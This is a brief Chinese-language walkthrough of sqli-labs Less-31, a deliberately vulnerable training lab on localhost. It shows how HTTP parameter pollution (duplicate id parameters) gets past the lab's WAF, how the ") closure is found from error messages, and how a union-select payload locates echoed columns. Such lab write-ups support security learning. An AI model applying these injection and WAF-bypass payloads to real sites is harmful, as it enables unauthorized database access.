sqli-labs (less-31)
进入31,这里我们直接查看源文件
依然存在login.php文件
http://127.0.0.1/sql1/Less-31/login.php?id=1
http://127.0.0.1/sql1/Less-31/login.php?id=1'
WAF成功抵挡攻击
http://127.0.0.1/sql1/Less-31/login.php?id=1&id=2
http://127.0.0.1/sql1/Less-31/login.php?id=1&id=2' #回显正常
http://127.0.0.1/sql1/Less-31/login.php?id=1&id=2" #回显错误
根据错误信息判断闭合方式为")–+,并且为字符型注入
判断回显位置
http://127.0.0.1/sql1/Less-31/login.php?id=1&id=-2") union select 1,2,3--+
接下来的步骤与less-29一模一样,这里不具体介绍,具体过程请看我的less-29